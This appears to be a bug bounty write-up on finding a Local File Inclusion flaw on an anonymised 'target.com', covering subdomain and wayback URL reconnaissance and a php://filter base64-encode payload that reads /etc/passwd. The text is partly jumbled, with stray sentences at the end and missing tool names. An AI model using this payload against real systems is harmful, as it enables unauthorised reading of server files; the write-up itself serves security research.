Easy LFI
Easy Local File Inclusion Report
Last updated
Was this helpful?
Easy Local File Inclusion Report
Last updated
Was this helpful?
Hello Hackers !!
I`m going to share one of my last & fast finding
let’s call it target.com, they runs a bug bounty program with wildcard scope *.target.com
In this step it`s a gold tip to use multiple tools to gather good results, I like to use
Subdomainer is an automation tool for domains & subdomains gatherin wheather for single target or multiple targets. Subdomainer uses multiple tools for doing the subdomains & domians gathering job in a perfect way, it can take a domains / targets list and doing the whole operation on them and after finshing the job it save the result in a comprehandable & ordered way.
A simple usage for Subdomainer
./subdomainer -t target.com –f true
A lot of thing comes after subdomains gathering, one of them is collect all urls from live hosts and filter any intersting parameters or endpoints
So in this step I use
Usage Of Waybackurl: This is really a good tool for bugbounty hunter to fetch all url from wayback machine .
cat all_live.txt | waybackurls
Now we have all wayback urls now You can grep to collect you interesting parameter or end point usage:
grep -iE “redirect=”
A wrapper around grep to avoid typing common patterns.
cat waybackdata | gf lfi | tee -a lfi.txt
after that we can go and check these endpoint manually
Luckily, I noticed a very promising endpoint /download.php?file
and my spidey sense got activated
After visiting this host i found that this endpoint was for downloading pdf files
when trying to inject 1
to this parameter It downloads a file contain this error
so clearly this function job is to seacrh for a requested file via this parametr in this path and try to get
without another thought i injected some payloads like this:
But no luck .. i got the same error message
in spite of that something was telling me to keep digging into this 🧐
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter allows a pen tester to include local files and base64 encodes the output. Therefore, any base64 output will need to be decoded to reveal the contents
So let`s decode this base64 string
echo "BASE64_STRING" | base64 -d
And we got our /passwd file decoded
xss
ssrf
idor
ssti
open redirect
etc
A great Place to find more LFI bypassing tricks:
Thanks For Reading
But that would take a lot of time and effort. To automate this process we can use tool
By using I found that this host is running on php, so I used php file wrappers payload
Although these tools and techniques are few, there is a lot that can be done with it . you can use multiple to get :